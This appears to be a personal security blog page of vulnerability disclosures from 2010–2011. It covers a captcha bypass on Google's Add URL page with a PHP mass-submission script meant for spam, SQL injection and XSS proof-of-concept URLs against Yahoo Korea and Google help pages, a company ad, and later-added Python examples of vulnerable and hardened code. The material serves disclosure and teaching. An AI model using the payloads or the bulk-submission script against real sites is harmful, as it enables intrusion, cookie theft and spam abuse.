Add URL to Google.com Captcha Bypass

September 12, 2011
This captcha bypass allows a spammer to submit a number of websites (possibly
more than 1000) to the Google crawl by writing a simple program in any
programming language.

Original link (With captcha):
www.google.com/addurl/?continue=/addurl

Bypass captcha link POC:  http://www.google.com/addurl?q=www.mysite.com&hl=&dqq=

If you execute the above URL in the browser
then it will add the new website to Google crawl database.

The following program can be used to submit a large number of websites at a time.

PHP Code 

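<?php
// Run only when the form below has been submitted.
if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["urls"])) {
    $part1 = "http://www.google.com/addurl?q=";
    $part2 = "&hl=&dqq=";
    $curl = curl_init("http://google.com");
    // Keep the response bodies out of this page's output.
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_exec($curl);

    $urls = $_POST["urls"];

    // One website per line.
    $lines = explode("\n", $urls);

    foreach ($lines as $line) {
        $line = trim($line);
        if ($line === "") {
            continue;
        }
        $new = str_replace(" ", "", $part1 . $line . $part2);
        curl_setopt($curl, CURLOPT_URL, $new);
        // Send the request for this line.
        curl_exec($curl);
    }
    curl_close($curl);
    echo "done.";
}
?>
<html>
<head>
<title>Google Add Urls</title>
</head>
<body>
<form method="post">
<textarea name="urls" cols="20" rows="100"></textarea><br />
<input type="submit" value="add urls" />
</form>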
</body>
</html>

This may be a small vulnerability, but we still want Google to be the most secure! So
please try to fix it. Otherwise there will be no use for the captcha.

Google has now patched this vuln :)

/peace

Sandeep k.
We Provide Penetration Testing

Lex Code Technologies

August 21, 2011

Welcome to Lex Code Technologies

Welcome to lexcode technologies – a professional web development and offshore outsourcing company based in India striving to deliver quality solutions with less profit margin by using technology and our vast experience. We offer a wide range of services to reach your targeted audience and share your valuable information focusing on retaining your customers. It’s our hard work, efficient and effective solution that has given us domestic and global giants as satisfied clients in a short span of 2 years.

 

For more information visit

www.Lexcodetechnologies.com


Project 0day – PHP Source Code Testing Tool

August 9, 2011

“PHP Source Auditor”

Overview

This is a special-purpose tool for developers who write code in PHP. PSA scans deep into source code files, detects the vulnerable lines of code, and reports the vulnerability information to the developer.

System Requirement:

  1. Latest .NET Framework
  2. Windows Installed Machine

Vulnerabilities detected by PSA:

  1. SQL Injection
  2. Remote File Inclusion
  3. Local File Inclusion
  4. Cross Site Scripting
  5. Cross Site Request Forgery
  6. Insecure Cookie Handling
  7. Remote Code Execution
  8. Remote Command Execution
  9. Authentication Bypass

Features :

  • Importing Multiple Files At a Time
  • User Friendly GUI
  • PHP Syntax Highlighting
  • Highlighting Vulnerable Code
  • Pop Up Box for Replacing Vulnerable Code
  • Advanced Code Reviewing Method

Old Screen Shot Beta Version

Download Link : Distribution Closed

New Version Will Be Released Soon

Regards

Sandeepk


Yahoo Korea SQL XSS vulnerability

Author : Sandeep Kamble
Date : 21/03/2010
Domain : blogshop.yahoo.co.kr
Risk : High
Status : Fixed

Overview:

Yahoo Korea has a Blog-shop, which is one of the most famous subdomains in Korea.
A cross-site scripting (XSS) vulnerability affects blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.

Exploit Description :

It has SQL injection in the notice_read.html?key script. I was successful in retrieving Yahoo users' cookies through this SQL injection by inserting JavaScript into the SQL injection payload.

POC (Proof Of Concept ):

http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16'/**/UNION/**/SELECT/**/1,2,3,4,@@version,%3Cscript%3Ealert('XSS HERE');</script>,7,8,9,0,1,2,3,4,5,6,7--%20

Yahoo Korea XSS

Special thanks to Gaurav Kumar (www.lexcodetechnologies.com)

Regards

Sandeep Kamble
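
The chain described in this post, a SQL injection whose UNION branch lands in the HTML as markup, shown beside its fix as an added example (not code from the original post or from Yahoo). The table, column names and renderer functions are assumptions, SQLite stands in for the real database, and the injected value is an inert tag.

```python
import html
import re
import sqlite3

def make_db():
    # Constructed stand-in for the notice table behind notice_read.html.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notice (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.executemany("INSERT INTO notice VALUES (?, ?, ?)", [
        (16, "Maintenance", "Shop closed on Sunday"),
        (17, "Sale <today>", "Up to 50% off"),
    ])
    return db

def page(row):
    return "<p>not found</p>" if row is None else "<h1>%s</h1><p>%s</p>" % row

def render_vulnerable(db, key):
    # Before: key is pasted into the SQL text and the columns are written raw,
    # so a UNION branch chooses what ends up in the HTML.
    sql = "SELECT title, body FROM notice WHERE id = '" + key + "'"
    return page(db.execute(sql).fetchone())

def render_hardened(db, key):
    # After: accept only a short decimal id, bind it as a parameter, and
    # HTML-encode every column on output (stored data may contain markup too).
    if not re.fullmatch(r"[0-9]{1,9}", key):
        return page(None)
    row = db.execute("SELECT title, body FROM notice WHERE id = ?",
                     (int(key),)).fetchone()
    return page(row and tuple(html.escape(str(col)) for col in row))

# Constructed key with the same shape as the PoC above, using an inert tag.
UNION_KEY = "-16' UNION SELECT sqlite_version(), '<b>injected</b>' -- "

if __name__ == "__main__":
    db = make_db()
    for render in (render_vulnerable, render_hardened):
        for key in ("16", "17", UNION_KEY):
            print(render.__name__, repr(key[:12]), "->", render(db, key))
```

Binding the parameter closes the injection; the output encoding is a separate control that still matters when markup reaches the table by some other route, as row 17 shows.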


Google+ Help Support & Google Translator Help Support [XSS]

July 21, 2011

——————————————————————
0x1 Affected Script: Google+ Help Support & Google Translator Help Support
0x2 Script Link: http://translate.google.com/ & http://plus.google.com/

0x4 Author: Sandeep kamble
0x5 Reported : June 30 2011
0x6 Public Release July 21 2011
——————————————————————

Affected Script Overview : Google+ Help Center where you can find tips and tutorials on using Google+ and other answers to frequently asked questions and Google Translate Help Center where you can find tips and tutorials on using Google Translate and other answers to frequently asked questions.

Affected script :
1) +/bin/search.py?query=
2) support/bin/search.py?query=  (Subdomain Translator)

Exploit : 

Executing JavaScript using the vulnerable variable called ?query. This attack is commonly known as cross-site scripting (XSS).
The affected Google+ script has a stored XSS, which can be used for grabbing cookies.
Google Translator has a non-persistent XSS, which can be used only to execute JS script.

POC :
1) Google +

http://www.google.com/support/+/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27ss%27%29%3C/script%3E&btnG=Search
Don’t be shocked: you might be wondering why the payload “alert(‘ss’)” gives “XSS” as output in the message. This happens due to spelling correction (Google's “did you mean” function).

Try searching for the keyword “<script>alert(‘ss’)</script>” and you will see why this happens.

2) Translator Google
http://translate.google.com/support/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27s%27%29%3C%2Fscript%3E&btnG=Search+Help&ctx=en%3Asearchbox
I don’t have a screenshot of the Google Translator XSS attack.

 

Google XSS

 

Countermeasure

1) Determine whether HTML output includes input parameters
2) In short perform input sanitization
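
Countermeasure 1 written as a regression check, as an added example (not code from the original post or from Google): it reports which query parameters reach the HTML unencoded. The template function, the host name and the probe value are assumptions, and the probe is an inert tag; the template has two sinks because, as noted above, the "did you mean" output echoes the query as well as the search box.

```python
import html
from urllib.parse import parse_qsl, urlsplit

META = set("<>\"'&")

def reflected_params(url, body):
    """Map each query parameter echoed in body to 'raw' or 'encoded'."""
    found = {}
    for name, value in parse_qsl(urlsplit(url).query):
        if not META & set(value):
            continue  # no HTML metacharacters: an echo proves nothing
        if value in body:
            found[name] = "raw"          # reaches the page unencoded
        elif html.escape(value, quote=True) in body:
            found[name] = "encoded"      # echoed, but neutralised
    return found

def search_page(query, escape_input, escape_suggestion):
    # Hypothetical help-search template with two sinks: the search box and
    # the "did you mean" line.
    enc = lambda s: html.escape(s, quote=True)
    suggestion = query  # stand-in for the spelling corrector
    box = enc(query) if escape_input else query
    hint = enc(suggestion) if escape_suggestion else suggestion
    return '<input name="query" value="%s"><p>Did you mean: %s</p>' % (box, hint)

# Constructed probe URL shaped like the PoC links: inert tag, no script.
PROBE_URL = ("http://help.example/support/bin/search.py"
             "?query=%22%3Ezq7%3Cb%3E&btnG=Search")
PROBE = dict(parse_qsl(urlsplit(PROBE_URL).query))["query"]

if __name__ == "__main__":
    for flags in ((False, False), (True, False), (True, True)):
        body = search_page(PROBE, *flags)
        print(flags, reflected_params(PROBE_URL, body))
```

A page that encodes the search box but not the suggestion line is still reported as "raw", which is the case a fix applied to only one sink leaves behind.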

Thank you to Google

http://www.google.com/about/corporate/company/halloffame.html

If you want to test your application: vulnerability research and penetration testing service. Follow me on Twitter @sandeepL337

 


About my blog & me

This is my personal blog. I am going to share my personal things that are related to IT security. I am going to share all my experiences that are related to information technology.

Special thanks to Sahil Sir, Kalpesh Sir, Ayesha mam, shaista mam & my team :) and my friends Kishor , Lalit , Jitu ,Mug .

My Gmail : sandeepk.l337@gmail.com
